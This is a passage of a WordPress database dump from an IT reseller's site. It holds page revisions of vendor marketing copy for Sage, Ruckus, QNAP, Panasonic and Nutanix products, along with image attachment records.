id=\"header_0_PrimaryNavigationRepeater_PagePreviewsRepeater_0_TitleControl_0\" class=\"h2\"><span id=\"header_0_PrimaryNavigationRepeater_PagePreviewsRepeater_0_lblPreviewTitle_0\">Sage Business Cloud</span></h3>\r\nSage Business Cloud is all you\'ll ever need to help your small or medium-sized business grow faster.\r\n\r\nSimply start with one of our core products and add on other Sage Business Cloud products or products from our marketplace. Tailor the solution that is just right for your needs.\r\n<h3>The Connected Business. Enabled.</h3>\r\n<h4>Whether youâ€™re running a startup or a global enterprise, take care of your finances, operations, and more with Sage Business Cloud.</h4>\r\nEverything your business needs under one platform to manage your accounting, financials, operations, people and payroll, regardless of size, complexity and industry. Sage Business Cloud brings together our broad range of cloud products combined with an applications marketplace that can deliver a one-stop-shop solution, providing our customers with the only business management platform theyâ€™ll need throughout their business journey.\r\n\r\nLocally, weâ€™re busy building a path to Sage Business Cloud by rapidly adding products from our global suite, cloud enabling and enhancing local products, and working with our ecosystem partners to complete this vision of enabling connected business for our customers.\r\n\r\nSimply start with one of our core desktop or cloud connected desktop products, and add on other Sage Business Cloud products or products from our applications marketplace once available so you can tailor the solution that is just right for your business needs.\r\n<h3><strong>Sage 300cloud</strong></h3>\r\nThe same capabilities of Sage 300 desktop solution with cloud connected features so you can reap the benefits of mobility, anytime/anywhere access, and a modern new user interface as well as dashboard with key performance indicators.Take care of your finances, operations, and inventory. For larger businesses.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Sage','','inherit','closed','closed','','1579-autosave-v1','','','2018-12-14 15:26:16','2018-12-14 07:26:16','',1579,'https://bintara.com.my/blog/2018/12/14/1579-autosave-v1/',0,'revision','',0),(2182,1,'2018-12-14 15:23:31','2018-12-14 07:23:31','<h3 id=\"header_0_PrimaryNavigationRepeater_PagePreviewsRepeater_0_TitleControl_0\" class=\"h2\"><span id=\"header_0_PrimaryNavigationRepeater_PagePreviewsRepeater_0_lblPreviewTitle_0\">Sage Business Cloud</span></h3>\r\nSage Business Cloud is all you\'ll ever need to help your small or medium-sized business grow faster.\r\n\r\nSimply start with one of our core products and add on other Sage Business Cloud products or products from our marketplace. Tailor the solution that is just right for your needs.\r\n<h3>The Connected Business. Enabled.</h3>\r\n<h4>Whether youâ€™re running a startup or a global enterprise, take care of your finances, operations, and more with Sage Business Cloud.</h4>\r\nEverything your business needs under one platform to manage your accounting, financials, operations, people and payroll, regardless of size, complexity and industry. Sage Business Cloud brings together our broad range of cloud products combined with an applications marketplace that can deliver a one-stop-shop solution, providing our customers with the only business management platform theyâ€™ll need throughout their business journey.\r\n\r\nLocally, weâ€™re busy building a path to Sage Business Cloud by rapidly adding products from our global suite, cloud enabling and enhancing local products, and working with our ecosystem partners to complete this vision of enabling connected business for our customers.\r\n\r\nSimply start with one of our core desktop or cloud connected desktop products, and add on other Sage Business Cloud products or products from our applications marketplace once available so you can tailor the solution that is just right for your business needs.\r\n<h3><strong>Sage 300cloud</strong></h3>\r\nThe same capabilities of Sage 300 desktop solution with cloud connected features so you can reap the benefits of mobility, anytime/anywhere access, and a modern new user interface as well as dashboard with key performance indicators.Take care of your finances, operations, and inventory. For larger businesses.','Sage','','inherit','closed','closed','','1579-revision-v1','','','2018-12-14 15:23:31','2018-12-14 07:23:31','',1579,'https://bintara.com.my/blog/2018/12/14/1579-revision-v1/',0,'revision','',0),(2183,1,'2018-12-14 15:25:54','2018-12-14 07:25:54','<h3 id=\"header_0_PrimaryNavigationRepeater_PagePreviewsRepeater_0_TitleControl_0\" class=\"h2\"><span id=\"header_0_PrimaryNavigationRepeater_PagePreviewsRepeater_0_lblPreviewTitle_0\">Sage Business Cloud</span></h3>\r\nSage Business Cloud is all you\'ll ever need to help your small or medium-sized business grow faster.\r\n\r\nSimply start with one of our core products and add on other Sage Business Cloud products or products from our marketplace. Tailor the solution that is just right for your needs.\r\n<h3>The Connected Business. Enabled.</h3>\r\n<h4>Whether youâ€™re running a startup or a global enterprise, take care of your finances, operations, and more with Sage Business Cloud.</h4>\r\nEverything your business needs under one platform to manage your accounting, financials, operations, people and payroll, regardless of size, complexity and industry. Sage Business Cloud brings together our broad range of cloud products combined with an applications marketplace that can deliver a one-stop-shop solution, providing our customers with the only business management platform theyâ€™ll need throughout their business journey.\r\n\r\nLocally, weâ€™re busy building a path to Sage Business Cloud by rapidly adding products from our global suite, cloud enabling and enhancing local products, and working with our ecosystem partners to complete this vision of enabling connected business for our customers.\r\n\r\nSimply start with one of our core desktop or cloud connected desktop products, and add on other Sage Business Cloud products or products from our applications marketplace once available so you can tailor the solution that is just right for your business needs.\r\n<h3><strong>Sage 300cloud</strong></h3>\r\nThe same capabilities of Sage 300 desktop solution with cloud connected features so you can reap the benefits of mobility, anytime/anywhere access, and a modern new user interface as well as dashboard with key performance indicators.Take care of your finances, operations, and inventory. For larger businesses.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Sage','','inherit','closed','closed','','1579-revision-v1','','','2018-12-14 15:25:54','2018-12-14 07:25:54','',1579,'https://bintara.com.my/blog/2018/12/14/1579-revision-v1/',0,'revision','',0),(2186,1,'2018-12-14 15:35:05','2018-12-14 07:35:05','<h3>Ruckus SMALL AND MEDIUM BUSINESS</h3>\r\n<h4>SMB Wi-Fi and Network Solutions that Just Work</h4>\r\nSmall and medium-size businesses (SMBs) rely on worry-free, high-performance Wi-Fi to spark growth and boost productivity. With Ruckus, Wi-Fi for businessÂ is both easy and affordable. Turn any space into a workspace with dependable network coverage. Easily set up different types of secure guest networks on the fly to engage with customers, partners, suppliers, and contractors. Ruckus access points (APs) and switches offer superior coverage and capacity, so you can grow without going over budget.\r\n\r\nYou also donâ€™t need specialized IT staff or extensive training to deploy and manage your Ruckus small business Wi-Fi solutions. With Ruckus, it just works.\r\n<div>\r\n<h3>Controller-less and Cloud-managed Wi-Fi Options</h3>\r\nNo IT staff?Â  No problem.Â Â Ruckus Unleashed APsÂ are plug-and-play simple, so Unleashed is the ideal Wi-Fi small business solution for your single-site business. Even without an IT staff, you can set up a high-performance WLAN to connect employees, serve customers, and support business operations.\r\n\r\n</div>\r\n<div>ChooseÂ Ruckus Cloud Wi-FiÂ if you have big expectations for your multi-site WLAN, but not big IT budgets or staff. Manage your sites from anywhere using a single-pane-of-glass web UI or the Ruckus Cloud mobile app. With cloud-managed Wi-Fi you never have to worry about software updates and security upgradesâ€”theyâ€™re handled automatically.</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<h3>Running Your SMB Business Over Wi-Fi</h3>\r\nIn a world increasingly dependent on internet connectivity, employee productivity and customer satisfaction depend on uninterrupted network access. You want the best Wi-Fi AP for your business. Ruckus APs and switches incorporate patented technologies for superior throughput, coverage, and capacity.\r\n\r\n</div>\r\nRuckus also ensures a rock-solid foundation for cloud-based business applications that make you more competitive, including: mobile inventory management, point-of-sale, collaboration services, customer relationship management, and ecommerce.\r\n<div>\r\n<h3>Wi-Fi for Business Gains and Cost Reductions</h3>\r\nAs you expand your small business Wi-Fi network, you want to be conservative with costs. Our products and services are built with cost savings in mind. Here are just a few of the ways we achieve that for you:\r\n\r\n</div>\r\n<ul>\r\n 	<li>Ruckus Unleashed and Ruckus Cloud Wi-Fi keep costs down by eliminating the need for on-premises controllers and reducing dependence on expensive IT resources.</li>\r\n 	<li>Use Ruckus APs withÂ SmartMeshÂ to eliminate high cabling costs in large spaces (like warehouses) and strengthen redundancy. Both Ruckus Unleashed and Ruckus Cloud Wi-Fi support meshing.</li>\r\n 	<li>Ruckus APs offer better capacity and coverage (handing as much as 50% more clients than competitive solutions). Fewer APs needed means savings on licenses, cable runs, switch ports, and power.</li>\r\n 	<li>Ruckus ICX switchesÂ offer easily upgradeable and scalable high performance connectivity for APs, VoIP phones and other network devices.Â  Available with silent operation (i.e. no fan noise) in rack-mount or compact 12-port form factor.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>','Ruckus','','inherit','closed','closed','','1578-revision-v1','','','2018-12-14 15:35:05','2018-12-14 07:35:05','',1578,'https://bintara.com.my/blog/2018/12/14/1578-revision-v1/',0,'revision','',0),(2187,1,'2018-12-14 15:46:11','2018-12-14 07:46:11','<h3 class=\"tit03\">Building your business with the Turbo NAS</h3>\r\n<p class=\"txt01\">Whether starting out or growing; businesses require a rock-solid IT infrastructure that will ensure that they have the right tools, hardware and potential to continue growing. And out of all the elements in an IT base, storage is the lifeblood that keeps a company moving forward. QNAP provides a full range of cutting-edge network-attached storage devices that not only fulfill storage needs, but also provide a wide range of services and features to greatly increase the productivity and options of your business.</p>\r\n\r\n<h4 class=\"tit02\">Challenges for aÂ growing business</h4>\r\n<p class=\"txt01\">See just a number of the common issues surrounding a growing business, before finding out how the Turbo NAS can help.</p>\r\n&nbsp;\r\n<h3 class=\"tit01\">How a Turbo NAS can assist your business</h3>\r\nUser-friendly design withÂ easy installation &amp; maintenance. From its intuitive user interface, to one-click installation and ease of installing new drives, the Turbo NAS.\r\n\r\n&nbsp;\r\n<h4>Hassle-free remoteÂ access options</h4>\r\nHave all of your critical files at your fingertips in order to seal a deal or to complete your work with a wide range of remote access options. From syncing to mobile devices to accessing virtual machines, you can always take your office with you, wherever you go..\r\n\r\n&nbsp;\r\n<h4>Go beyond storage withÂ QNAP business apps</h4>\r\nThe Turbo NAS is more than just storage. With a wide range of business-optimized apps, it can be the core of an email server, web server, printer server, virtualization tasks, and much more.\r\n\r\n&nbsp;\r\n<h4>Scale your storage forÂ future needs.</h4>\r\nYou can connect the Turbo NAS to compatible QNAP Expansion Enclosures and effortlessly scale the existing storage base as needed. This ensures that none of your initial investment goes to waste.\r\n\r\n&nbsp;\r\n<h4>Centralized storage &amp;Â backup</h4>\r\nWith a large storage capacity, excellent file transfer speed, a range of backup apps and solid hardware, the Turbo NAS is the perfect location for storing your crucial files and keeping them secure.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Qnap','','inherit','closed','closed','','1576-autosave-v1','','','2018-12-14 15:46:11','2018-12-14 07:46:11','',1576,'https://bintara.com.my/blog/2018/12/14/1576-autosave-v1/',0,'revision','',0),(2188,1,'2018-12-14 15:45:00','2018-12-14 07:45:00','<h3 class=\"tit03\">Building your business with the Turbo NAS</h3>\r\n<p class=\"txt01\">Whether starting out or growing; businesses require a rock-solid IT infrastructure that will ensure that they have the right tools, hardware and potential to continue growing. And out of all the elements in an IT base, storage is the lifeblood that keeps a company moving forward. QNAP provides a full range of cutting-edge network-attached storage devices that not only fulfill storage needs, but also provide a wide range of services and features to greatly increase the productivity and options of your business.</p>\r\n\r\n<h4 class=\"tit02\">Challenges for aÂ growing business</h4>\r\n<p class=\"txt01\">See just a number of the common issues surrounding a growing business, before finding out how the Turbo NAS can help.</p>\r\n&nbsp;\r\n<h3 class=\"tit01\">How a Turbo NAS can assist your business</h3>\r\nUser-friendly design withÂ easy installation &amp; maintenance. From its intuitive user interface, to one-click installation and ease of installing new drives, the Turbo NAS.\r\n\r\n&nbsp;\r\n<h3>Hassle-free remoteÂ access options</h3>\r\nHave all of your critical files at your fingertips in order to seal a deal or to complete your work with a wide range of remote access options. From syncing to mobile devices to accessing virtual machines, you can always take your office with you, wherever you go..\r\n\r\n&nbsp;\r\n<h3>Go beyond storage withÂ QNAP business apps</h3>\r\nThe Turbo NAS is more than just storage. With a wide range of business-optimized apps, it can be the core of an email server, web server, printer server, virtualization tasks, and much more.\r\n\r\n&nbsp;\r\n<h3>Scale your storage forÂ future needs.</h3>\r\nYou can connect the Turbo NAS to compatible QNAP Expansion Enclosures and effortlessly scale the existing storage base as needed. This ensures that none of your initial investment goes to waste.\r\n\r\n&nbsp;\r\n<h3>Centralized storage &amp;Â backup</h3>\r\nWith a large storage capacity, excellent file transfer speed, a range of backup apps and solid hardware, the Turbo NAS is the perfect location for storing your crucial files and keeping them secure.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Qnap','','inherit','closed','closed','','1576-revision-v1','','','2018-12-14 15:45:00','2018-12-14 07:45:00','',1576,'https://bintara.com.my/blog/2018/12/14/1576-revision-v1/',0,'revision','',0),(2189,1,'2018-12-14 15:46:03','2018-12-14 07:46:03','<h3 class=\"tit03\">Building your business with the Turbo NAS</h3>\r\n<p class=\"txt01\">Whether starting out or growing; businesses require a rock-solid IT infrastructure that will ensure that they have the right tools, hardware and potential to continue growing. And out of all the elements in an IT base, storage is the lifeblood that keeps a company moving forward. QNAP provides a full range of cutting-edge network-attached storage devices that not only fulfill storage needs, but also provide a wide range of services and features to greatly increase the productivity and options of your business.</p>\r\n\r\n<h4 class=\"tit02\">Challenges for aÂ growing business</h4>\r\n<p class=\"txt01\">See just a number of the common issues surrounding a growing business, before finding out how the Turbo NAS can help.</p>\r\n&nbsp;\r\n<h3 class=\"tit01\">How a Turbo NAS can assist your business</h3>\r\nUser-friendly design withÂ easy installation &amp; maintenance. From its intuitive user interface, to one-click installation and ease of installing new drives, the Turbo NAS.\r\n\r\n&nbsp;\r\n<h4>Hassle-free remoteÂ access options</h4>\r\nHave all of your critical files at your fingertips in order to seal a deal or to complete your work with a wide range of remote access options. From syncing to mobile devices to accessing virtual machines, you can always take your office with you, wherever you go..\r\n\r\n&nbsp;\r\n<h4>Go beyond storage withÂ QNAP business apps</h4>\r\nThe Turbo NAS is more than just storage. With a wide range of business-optimized apps, it can be the core of an email server, web server, printer server, virtualization tasks, and much more.\r\n\r\n&nbsp;\r\n<h4>Scale your storage forÂ future needs.</h4>\r\nYou can connect the Turbo NAS to compatible QNAP Expansion Enclosures and effortlessly scale the existing storage base as needed. This ensures that none of your initial investment goes to waste.\r\n\r\n&nbsp;\r\n<h4>Centralized storage &amp;Â backup</h4>\r\nWith a large storage capacity, excellent file transfer speed, a range of backup apps and solid hardware, the Turbo NAS is the perfect location for storing your crucial files and keeping them secure.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Qnap','','inherit','closed','closed','','1576-revision-v1','','','2018-12-14 15:46:03','2018-12-14 07:46:03','',1576,'https://bintara.com.my/blog/2018/12/14/1576-revision-v1/',0,'revision','',0),(2190,1,'2018-12-14 15:56:30','2018-12-14 07:56:30','<h3>HD Visual Communications System Global</h3>\n<img class=\"alignnone size-full wp-image-2191\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/main_image02.jpg\" alt=\"\" width=\"967\" height=\"265\" />\n\nThe Panasonic HD Visual Communications System is a new visual communication tool that is clearly different from previous videoconference systems. High image quality, high sound quality, and a stable connection have been achieved both with intranets and the Internet, enabling easy, comfortable communication between remote locations. The technologies that Panasonic has accumulated from its AV devices serve as the core of this system.\n\n&nbsp;\n\nWith the HD Visual Communications System, you can conduct natural conversations with high image and sound quality, as if the person you are talking to were standing right next to you, for more personal communication. This lets you apply the HD Visual Communications System to a variety of situations that were difficult for conventional videoconference systems.\n<div class=\"cat-contentcopy\">\n<p class=\"size12\"><strong>The main unit is highly functional, the remote control is easy to use, and the optional boundary microphone has advanced specifications.</strong></p>\n\n</div>\n<h4>Connection to Multiple Sites</h4>\nThe HDVC System can connect up to 24 sites without any optional equipment. It can connect via intranet or Internet, thus enabling multi-site videoconferencing with a client or with people in distant locations via mobile devices.\n<h4>Easy to Use</h4>\n<p class=\"size12 paddingbottom15\">The Triple Monitor function displays a PC document and the images of distant sites and the home location on three monitors. The sub camera function displays fine details in a close-up view. Various convenient functions help to make communication smooth and accurate.</p>\n\n<h4>Clear Communication</h4>\nThe HDVC System incorporates Panasonic\'s high-quality image and sound technologies cultivated in the development of various AV products over the years. The system conveys facial expressions and nuances of voices to facilitate discussions and remote lectures.','Panasonic','','inherit','closed','closed','','1570-autosave-v1','','','2018-12-14 15:56:30','2018-12-14 07:56:30','',1570,'https://bintara.com.my/blog/2018/12/14/1570-autosave-v1/',0,'revision','',0),(2191,1,'2018-12-14 15:55:50','2018-12-14 07:55:50','','main_image02','','inherit','closed','closed','','main_image02','','','2018-12-14 15:55:50','2018-12-14 07:55:50','',1570,'https://bintara.com.my/wp-content/uploads/2018/12/main_image02.jpg',0,'attachment','image/jpeg',0),(2192,1,'2018-12-14 15:56:30','2018-12-14 07:56:30','','main_image03','','inherit','closed','closed','','main_image03','','','2018-12-14 15:56:30','2018-12-14 07:56:30','',1570,'https://bintara.com.my/wp-content/uploads/2018/12/main_image03.jpg',0,'attachment','image/jpeg',0),(2193,1,'2018-12-14 15:56:42','2018-12-14 07:56:42','<h3>HD Visual Communications System Global</h3>\r\n<img class=\"alignnone size-full wp-image-2191\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/main_image02.jpg\" alt=\"\" width=\"967\" height=\"265\" />\r\n\r\nThe Panasonic HD Visual Communications System is a new visual communication tool that is clearly different from previous videoconference systems. High image quality, high sound quality, and a stable connection have been achieved both with intranets and the Internet, enabling easy, comfortable communication between remote locations. The technologies that Panasonic has accumulated from its AV devices serve as the core of this system.\r\n\r\n<img class=\"alignnone size-full wp-image-2192\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/main_image03.jpg\" alt=\"\" width=\"967\" height=\"265\" />\r\n\r\nWith the HD Visual Communications System, you can conduct natural conversations with high image and sound quality, as if the person you are talking to were standing right next to you, for more personal communication. This lets you apply the HD Visual Communications System to a variety of situations that were difficult for conventional videoconference systems.\r\n<div class=\"cat-contentcopy\">\r\n<p class=\"size12\"><strong>The main unit is highly functional, the remote control is easy to use, and the optional boundary microphone has advanced specifications.</strong></p>\r\n\r\n</div>\r\n<h4>Connection to Multiple Sites</h4>\r\nThe HDVC System can connect up to 24 sites without any optional equipment. It can connect via intranet or Internet, thus enabling multi-site videoconferencing with a client or with people in distant locations via mobile devices.\r\n<h4>Easy to Use</h4>\r\n<p class=\"size12 paddingbottom15\">The Triple Monitor function displays a PC document and the images of distant sites and the home location on three monitors. The sub camera function displays fine details in a close-up view. Various convenient functions help to make communication smooth and accurate.</p>\r\n\r\n<h4>Clear Communication</h4>\r\nThe HDVC System incorporates Panasonic\'s high-quality image and sound technologies cultivated in the development of various AV products over the years. The system conveys facial expressions and nuances of voices to facilitate discussions and remote lectures.','Panasonic','','inherit','closed','closed','','1570-revision-v1','','','2018-12-14 15:56:42','2018-12-14 07:56:42','',1570,'https://bintara.com.my/blog/2018/12/14/1570-revision-v1/',0,'revision','',0),(2196,1,'2018-12-14 16:04:26','2018-12-14 08:04:26','','Image-4b_0','','inherit','closed','closed','','image-4b_0','','','2018-12-14 16:04:26','2018-12-14 08:04:26','',1571,'https://bintara.com.my/wp-content/uploads/2018/12/Image-4b_0.jpg',0,'attachment','image/jpeg',0),(2197,1,'2018-12-14 16:04:41','2018-12-14 08:04:41','','CF-MX4_bannerimage_v2_0_0_0','','inherit','closed','closed','','cf-mx4_bannerimage_v2_0_0_0','','','2018-12-14 16:04:41','2018-12-14 08:04:41','',1571,'https://bintara.com.my/wp-content/uploads/2018/12/CF-MX4_bannerimage_v2_0_0_0.jpg',0,'attachment','image/jpeg',0),(2198,1,'2018-12-14 16:04:49','2018-12-14 08:04:49','<h3>Toughbook and Toughpad Range</h3>\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nWhatever your sector, whatever your challenge, whatever your working conditions, there will be a Toughbook solution for you, ranging from the ultra-durability of our fully ruggedised Toughbook and Toughpad devices through to our super stylish Toughpad 4K. All models are designed for your needs with the latest technologies and are capable of withstanding the conditions you operate in and can help you go further, achieve more and transform the way you work.\r\n\r\n<img class=\"alignnone size-full wp-image-2195\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Image-2a_1_0.jpg\" alt=\"\" width=\"1200\" height=\"420\" />\r\n<h5>The Fully Rugged Toughbook models meet the demands of the most challenging working environments</h5>\r\nThe fully rugged Toughbook models are dust, water, vibration and drop proof from a height of up to 180cm. The Toughbook range is designed to operate in both extremely low and high temperatures, and come in a variety of formats from laptop to tablet.\r\n\r\nAs well as being resistant to hostile and demanding environments such as construction sites, hospitals, underground excavations, emergency situations encountered by the emergency services, airline maintenance and management, utility services maintenance, and transport, they offer daylight visible screens, excellent graphics and long battery life. The fully rugged Toughbook models can meet almost every challenge business, utility or military service can deliver and ensure that mobile workers can access volumes of data and deliver information in real time wherever they are, increasing efficiency and productivity.\r\n\r\n<img class=\"alignnone size-full wp-image-2196\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Image-4b_0.jpg\" alt=\"\" width=\"1200\" height=\"420\" />\r\n<h5>The Semi Rugged and Business Ruggedised Toughbook models</h5>\r\nSemi Rugged Toughbook modelsÂ are water resistant and capable of withstanding being dropped* with a toughened casing. Semi Rugged notebook and convertible tablet models mean these mobile business computing solutions support workers in the field in diverse circumstances such as enabling police officers to take witness statements electronically, telephone engineers to work more effectively across the network and business travelers to effectively deliver presentations using the flip screen technology of the CF-C2.\r\n\r\nLong battery life, optional GPS and the option of technology that allows batteries to be changed whilst working, mean there is a model of semi rugged Toughbook suitable for every business that needs robust mobile computing solutions.\r\n\r\nThe Toughbook flip over business ruggedisedÂ CF-MX4Â is light, with an attractive design making it perfect for the busy business traveler allowing them to keep in touch with the office and work effectively on the move. The Toughbook is resistant to being dropped,* and withstands 100kg/f pressure, providing business travelers a robust alternative to more fragile mobile computing options.\r\n<h6>*From a height of 76cm.</h6>\r\n<img class=\"alignnone size-full wp-image-2197\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CF-MX4_bannerimage_v2_0_0_0.jpg\" alt=\"\" width=\"1200\" height=\"419\" />\r\n<h5>Computer docking solutions and accessories make Toughbook and Toughpad versatile and convenient</h5>\r\nWe offer a range of docking solutions, car chargers, battery chargers, bags, carrying straps and other accessories to ensure your business gets optimum performance from your Panasonic Toughbook and Toughpad devices. Click the link below to find out more about what is available.\r\n<h5>Professional Services to help you manage Toughbook and Toughpad hardware</h5>\r\nPanasonic is committed to providing you with the right computer product solution for your business. This is reflected in the range of professional services we offer. We can help with deployment to your workforce ensuring they have all the tools they need to work effectively and offer a buy-back programme for larger customers, to help you manage your investment in mobile working.\r\n\r\nTo discover more about the Toughbook and Toughpad range, please click the buttons below or contact us to discuss your needs.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Panasonic Toughbook','','inherit','closed','closed','','1571-revision-v1','','','2018-12-14 16:04:49','2018-12-14 08:04:49','',1571,'https://bintara.com.my/blog/2018/12/14/1571-revision-v1/',0,'revision','',0),(2199,1,'2018-12-14 16:43:55','2018-12-14 08:43:55','<h3><span class=\"color-accent-2\">Bring the Power of Enterprise Cloud Solutions to the Datacenter</span></h3>\r\n<div class=\"fl-row fl-row-full-width fl-row-bg-none fl-node-58ad2a2ac6c1e row-after-hero blocks-large-pt blocks-md-no-pt blocks-sm-no-pt blocks-large-pb blocks-md-no-pb blocks-sm-no-pb bg--double-angle default-color-theme--bg default-color-theme--top default-color-theme--bottom no-scroll-to-section\" data-node=\"58ad2a2ac6c1e\">\r\n<div class=\"fl-row-content-wrap\">\r\n<div class=\"fl-row-content fl-row-fixed-width fl-node-content\">\r\n<div class=\"fl-col-group fl-node-58ad2a2ac6b7f\" data-node=\"58ad2a2ac6b7f\">\r\n<div class=\"fl-col fl-node-58ad2a2ac6eb3\" data-node=\"58ad2a2ac6eb3\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58ad2a2ac6f51 fl-animation fl-slide-up fl-animated\" data-node=\"58ad2a2ac6f51\" data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-small-pb blocks-md-no-pb blocks-sm-no-pb default-color-theme\">\r\n<h4><img class=\"alignnone wp-image-2200 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/homestory-desktop-198x300.png\" alt=\"\" width=\"198\" height=\"300\" /></h4>\r\n<h4>The industryâ€™s leading hyperconverged solution delivers any application at any scale to power your business growth.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-col-group fl-node-58b08fb5149c5\" data-node=\"58b08fb5149c5\">\r\n<div class=\"fl-col fl-node-58b08fb514c31\" data-node=\"58b08fb514c31\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58b08fccb04ca fl-animation fl-slide-up fl-animated\" data-node=\"58b08fccb04ca\" data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-no-pb blocks-md-no-pb blocks-sm-no-pb default-color-theme\">\r\n<p class=\"p2\">The Nutanix Enterprise Cloud Platform simplifies infrastructure management so you can focus on delivering business value and innovation. Integrated data protection, non-disruptive upgrades, and self-healing systems ensure predictable performance, reliable disaster recovery, and efficient operations at lower cost.Â Get the power of One OS, One Click<sup>TM</sup>.</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-col fl-node-58b08fb514c7c fl-col-small\" data-node=\"58b08fb514c7c\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<h4 class=\"homestory__main__heading\">What is Nutanix Enterprise Cloud?</h4>\r\n<p class=\"homestory__main__text\">Nutanix Enterprise Cloud combines the agility and simplicity of the public cloud, with the security and control you need in a private cloud. Built on the industryâ€™s leadingÂ hyperconverged infrastructureÂ (HCI) technology, it integrates compute, storage, virtualization and networking in a full-stack solution that runs nearly any application.</p>\r\n\r\n<h4 class=\"homestory__main__heading\">Why Nutanix?</h4>\r\n<p class=\"homestory__main__text\">Only Nutanix delivers a single software OS that runs across clouds, making the boundaries between private, public and distributed clouds invisible. Nutanix solutions combine web-scale engineering with consumer-grade management to power any workload in multi-cloud environments.</p>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-row fl-row-full-width fl-row-bg-none fl-node-58ad2a2ac7316 blocks-medium-pt blocks-md-no-pt blocks-sm-no-pt blocks-no-pb blocks-md-no-pb blocks-sm-no-pb no-scroll-to-section\" data-node=\"58ad2a2ac7316\">\r\n<div class=\"fl-row-content-wrap\">\r\n<div class=\"fl-row-content fl-row-fixed-width fl-node-content\">\r\n<div class=\"fl-col-group fl-node-58ad2a2ac87c4\" data-node=\"58ad2a2ac87c4\">\r\n<div class=\"fl-col fl-node-58ad2a2ac880f\" data-node=\"58ad2a2ac880f\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58ad2a2ac6a0d fl-animation fl-slide-up fl-animated\" data-node=\"58ad2a2ac6a0d\" data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-medium-pb blocks-md-no-pb blocks-sm-no-pb default-color-theme\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Nutanix','','inherit','closed','closed','','1567-autosave-v1','','','2018-12-14 16:43:55','2018-12-14 08:43:55','',1567,'https://bintara.com.my/blog/2018/12/14/1567-autosave-v1/',0,'revision','',0),(2200,1,'2018-12-14 16:18:54','2018-12-14 08:18:54','','homestory-desktop','','inherit','closed','closed','','homestory-desktop','','','2018-12-14 16:18:54','2018-12-14 08:18:54','',1567,'https://bintara.com.my/wp-content/uploads/2018/12/homestory-desktop.png',0,'attachment','image/png',0),(2201,1,'2018-12-14 16:19:43','2018-12-14 08:19:43','<h3><span class=\"color-accent-2\">Bring the Power of Enterprise Cloud Solutions to the Datacenter</span></h3>\r\n<div class=\"fl-row fl-row-full-width fl-row-bg-none fl-node-58ad2a2ac6c1e row-after-hero blocks-large-pt blocks-md-no-pt blocks-sm-no-pt blocks-large-pb blocks-md-no-pb blocks-sm-no-pb bg--double-angle default-color-theme--bg default-color-theme--top default-color-theme--bottom no-scroll-to-section\" data-node=\"58ad2a2ac6c1e\">\r\n<div class=\"fl-row-content-wrap\">\r\n<div class=\"fl-row-content fl-row-fixed-width fl-node-content\">\r\n<div class=\"fl-col-group fl-node-58ad2a2ac6b7f\" data-node=\"58ad2a2ac6b7f\">\r\n<div class=\"fl-col fl-node-58ad2a2ac6eb3\" data-node=\"58ad2a2ac6eb3\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58ad2a2ac6f51 fl-animation fl-slide-up fl-animated\" data-node=\"58ad2a2ac6f51\" data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-small-pb blocks-md-no-pb blocks-sm-no-pb  default-color-theme\">\r\n<h4><img class=\"alignnone wp-image-2200 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/homestory-desktop-198x300.png\" alt=\"\" width=\"198\" height=\"300\" /></h4>\r\n<h4>The industryâ€™s leading hyperconverged solution delivers any application at any scale to power your business growth.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-col-group fl-node-58b08fb5149c5\" data-node=\"58b08fb5149c5\">\r\n<div class=\"fl-col fl-node-58b08fb514c31\" data-node=\"58b08fb514c31\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58b08fccb04ca fl-animation fl-slide-up fl-animated\" data-node=\"58b08fccb04ca\" 